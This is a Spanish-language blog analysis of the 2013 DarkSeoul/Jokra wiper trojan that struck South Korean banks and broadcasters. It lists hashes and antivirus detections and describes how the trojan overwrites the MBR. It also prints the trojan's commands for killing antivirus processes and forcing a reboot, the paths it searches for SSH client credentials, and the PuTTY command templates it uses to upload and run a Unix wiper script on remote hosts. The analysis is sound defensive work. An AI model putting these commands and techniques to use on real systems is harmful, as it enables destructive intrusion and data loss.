Software Development && UnEthical Hacking
inicio hacking WiFu WiBOG MDB

Troyano DarkSeoul / Jokra
General

En marzo de 2013 Corea del Sur sufrió un ciber-ataque que paralizo algunos sistemas de medios radiales (KBS, MBC y YTN) así como sistemas de bancos (Shinhan y Nonghyup), el ataque al parecer fue generado por un grupo llamado “Whois Team” a través de un troyano altamente destructivo.

Más información: South Korea on alert for cyber-attacks after major network goes down

Este tipo de malware no genero tráfico de red alguno ya que no descargo ningún componente adicional de Internet, tampoco roba información del sistema, la función principal del troyano es eliminar la Master Boot Record de todas las unidades de disco existentes en el equipo sobrescribiéndola con cualquiera de las siguientes palabras: PRINCPES, PR!CPES, HASTATI. Así mismo maneja un componente para buscar y conectarse a sistemas UNIX y realizar la misma acción.

MD5: fc7330c3251bdb7e84040aa018ad48a5
SHA256: 1fbecec5da37b9a6e6dd63add4988fe7e2c4249aada883f58bcb794020455b77
SHA1: 7ad8196b27c0d09b42ae21cfec70834f1fc52ff4
File size: 479.5 KB ( 491008 bytes )
File name: DarkSeoulDropper.exe Ver strings
File type: Win32 EXE
Detection ratio: 20 / 46
Analysis date:   2013-04-03 05:21:54 UTC

AntiVir TR/KillMBR.Y.2
Avast Win32:DarkSeoul-C [Trj]
AVG Generic32.OEI       
DrWeb Trojan.MulDrop4.27104              
ESET-NOD32      Win32/DarkSeoul.AA   
GData   Win32:DarkSeoul-C       
K7AntiVirus Trojan        
Kaspersky HEUR:Trojan.Win32.Generic              
McAfee Dropper-FDH
McAfee-GW-Edition Dropper-FDH!FC7330C3251B         
Microsoft Trojan:Win32/Dembr.A         
NANO-Antivirus Virus.Win32.Gen.ccmw            
Norman DarkSeoul.A   
nProtect Trojan/W32.Agent.491008.BR               
Panda   Trj/Jokra.A        
PCTools Trojan.Jokra    
Symantec Trojan.Jokra                
VBA32 BScope.Trojan.MTA.0161            
VIPRE Trojan.Win32.Generic!BT             
ViRobot Dropper.S.Agent.491008

MD5: db4bbdc36a78a8807ad9b15a562515c4
SHA256: d7a71f83d576fdf75e7978539bac04ad8b6605207b29379b89c24c0d0f31da61
SHA1: 309af225ac59e1d2ffaada11e09f5715bce16c1e
File size: 24.0 KB ( 24576 bytes )
File name: AgentBase.exe Ver strings
File type: Win32 EXE
Detection ratio: 40 / 46
Analysis date: 2013-04-03 05:25:17 UTC

 

Información del archivo en ejecución

Al ejecutar el troyano no se observa algún cambio drástico en la operación del equipo, pero después de algunos minutos se reinicia el sistema y se obtiene el mensaje que indica que no se encuentra el sistema operativo.

 

Al ejecutar GMER durante el tiempo que toma el troyano en reiniciar la maquina se alcanza a identificar el cambio en la MBR.

 

Análisis

 

El Dropper crea 5 archivos en la carpeta temporal “C:\Documents and Settings\Administrador\Configuración local\Temp” los cuales son usados con múltiples propósitos.

  • alg.exe: Una versión de la aplicación PuTTY.
  • conime.exe: Una versión de la aplicación PSCP (PuTTY Secure Copy client) la cual sirve para trasferir archivos de manera segura a través del protocolo SSH.
  • AgentBase.exe: Es la aplicación encargada de limpiar o sobrescribir la Master Boot Record MBR
  • ~v3.log – No alcanzo a ser creado durante el análisis.
  • ~pr1.tmp: Es un script para atacar y eliminar los sistemas operativos SunOS, AIX, HP-UX y Linux.

Creación de los archivos en la carpeta temporal:

 

Después de extraer los archivos el troyano ejecuta el componente AgentBase.exe el cual como ya se menciono es el encargado de realizar el proceso de sobrescritura de la Master Boot Record y de algunos componentes principales del sistema, de manera que si se recupera la MBR aun el sistema quede inservible.

 

Al analizar el archivo AgentBase.exe se pudo identificar la función que sobrescribe el disco con 512 bytes de la cadena PRINCIPES.

 

Al finalizar la Master Boot Record queda completamente sobrescrita con los 512 bytes, como se puede apreciar:

 

Seguido a esto termina con los procesos pasvc.exe y clisvc.exe los cuales pertenecen a dos antivirus coreanos Ahnlab y Hauri, y después reinicia el sistema mediante los comandos:

  • taskkill /F /IM pasvc.exe
  • taskkill /F /IM clisvc.exe
  • shutdown -r -t 0

Después el troyano escanea el sistema en busca de archivos de configuración para dos clientes SSH: Felix Deimel’s mRemote y VanDyke’s Secure CRT en las carpetas:

%sLocal Settings\Application Data\Felix_Deimel\mRemote\confCons.xml
%sApplication Data\VanDyke\Config\Sessions
%sAppData\Local\Felix_Deimel\mRemote\confCons.xml
%sAppData\Roaming\VanDyke\Config\Sessions

En dado caso que se encuentre alguno de los dos archivos el troyano extrae la información de conexión con los equipos remotos y con la ayuda de los clientes PuTTY (alg.exe y conime.exe) se conecta, carga y ejecuta el script ~pr1.tmp bajo el nombre /tmp/cups.

%s -batch -P %s -l %s -pw %s %s %s:/tmp/cups
%s -batch -P %s -l %s -pw %s %s "chmod 755 /tmp/cups;/tmp/cups"

 

Como se puede observar dicho script maneja una función para cada una de los sistemas operativos, buscando unidades de disco o simplemente eliminando las carpetas:

/kernel/
/usr/
/etc/
/home/

 

Enlaces


DarkSeoul: SophosLabs identifies malware used in South Korean internet attack
South Korean Banks and Broadcasting Organizations Suffer Major Damage from Cyber Attack
South Korean Wipers and Spear Phishing E-mails
Let's gossip what happens in South Korea
Multiplatform Wiper widespread in attacks against South Korea
Trojan.Jokra

 

Inicio       ||       Comunidad       ||      Servicios       ||      Proyectos       ||      Hacking       ||      Contáctenos